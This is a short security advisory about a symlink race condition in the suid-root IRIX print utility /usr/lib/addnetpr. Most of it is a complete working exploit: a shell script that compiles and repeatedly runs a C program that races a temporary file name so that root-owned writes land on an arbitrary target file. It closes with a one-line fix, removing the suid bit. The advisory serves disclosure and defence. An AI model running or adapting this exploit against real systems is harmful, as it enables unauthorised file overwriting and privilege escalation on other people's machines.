COMMAND

    /usr/lib/addnetpr

SYSTEMS AFFECTED

    IRIX 5.x, 6.x

PROBLEM

    There  is  race  condition  in  the  program,   /usr/lib/addnetpr,
    another suid root program for  print.  Here is the  exploit script
    for it.   But though this  was tested tried,  it was hard  to find
    the way to get root with it.  It can fill the target with the  two
    argument of addnetpr,  but with some  messages unable to  control.
    And  it   will  prompt   the   window   asking  root   passwd   to
    non-privilegedd (not  root, but  irix-specific privileged)  users.
    Privileged users bypass the window  and can run the race.   Tested
    both IRIX 5.3 and 6.2  Exploit follows and credit goes to  Jaechul
    Choe.

    #!/bin/sh

    PROG="`basename $0`"
    if [ $# -ne 1 ]; then
            echo "Usage: $PROG <target>"
            exit 1
    fi

    cat > expnetpr.c << _CREDIT_TO_ZOMO_
    void main(int argc, char *argv[])
    {
            char *template = "/var/tmp/printersXXXXXX";
            char *target;
            int pid;

            target = (char *)mktemp(template);

            if ((pid = fork()) > 0) {
                    sleep(3);
                    umask(0);
                    execl("/usr/lib/addnetpr", "addnetpr", "localhost","+", 0);
            }
            else
                    while(1) {
                            symlink(argv[1], target);
                            unlink(target);
                    }

    }
    _CREDIT_TO_ZOMO_

    /bin/cc expnetpr.c -o expnetpr
    if [ ! -f expnetpr ]; then
            echo "Couldn't compile expnetpr.c, lame! \nMake sure that C compiler has
     been installed from the IDO"
            exit 1
    fi

    while(`true`)
    do
            ./expnetpr $1&
            PID=$!
            sleep 15
            ls -al $1
            killall expnetpr
            killall addnetpr
    done

SOLUTION

    You should strip suid bit as  quick and dirty fix.  Long  term fix
    should be patch, but that's future.